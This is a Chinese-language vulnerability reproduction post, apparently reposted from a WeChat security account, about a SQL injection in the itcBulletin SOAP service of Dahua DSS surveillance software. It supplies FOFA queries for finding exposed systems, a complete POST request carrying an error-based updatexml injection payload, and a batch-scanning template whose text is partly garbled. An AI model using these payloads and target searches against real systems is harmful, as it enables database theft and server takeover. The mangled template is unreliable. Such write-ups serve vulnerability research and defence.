漏洞描述
大华 DSS存在SQL注入漏洞,攻击者 pota/services/itcBuletin 路由发送特殊构造的数据包,利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如,管理员后台密码、站点的用户人人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限
漏洞复现
第一步、使用下面fofa语句进行资产收集,确认测试目标
fofa语句body="<meta http-equiv="refresh" content="1;url='/admin'"></span>" || body="dahuaDefined/headCommon.js" || title=="DSS"
第二步、漏洞首页
第三步、使用burp抓取当前页面数据包...将数据包发送到repeater中修改数据包进行测试
POST /portal/services/itcBulletin?wsdl HTTP/1.1Host: ipAccept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 335<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'><s11:Body><ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'><netMarkings>(updatexml(1,concat(0x7e,user(),0x7e),1))) and (1=1</netMarkings></ns1:deleteBulletin></s11:Body></s11:Envelope>
批量脚本
id: template-idinfo:name: Template Nameauthor: kaliseverity: highdescription: descriptionreference:https://tags: tagsrequests:raw:|-POST /portal/services/itcBulletin?wsdl HTTP/1.1Host: {{Hostname}}: gzip: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: 335:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>:Body>:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'><netMarkings>and (1=1</netMarkings>:deleteBulletin>:Body>:Envelope>: andmatchers:type: wordpart: bodywords:'soap'
原文始发于微信公众号(揽月安全团队):大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论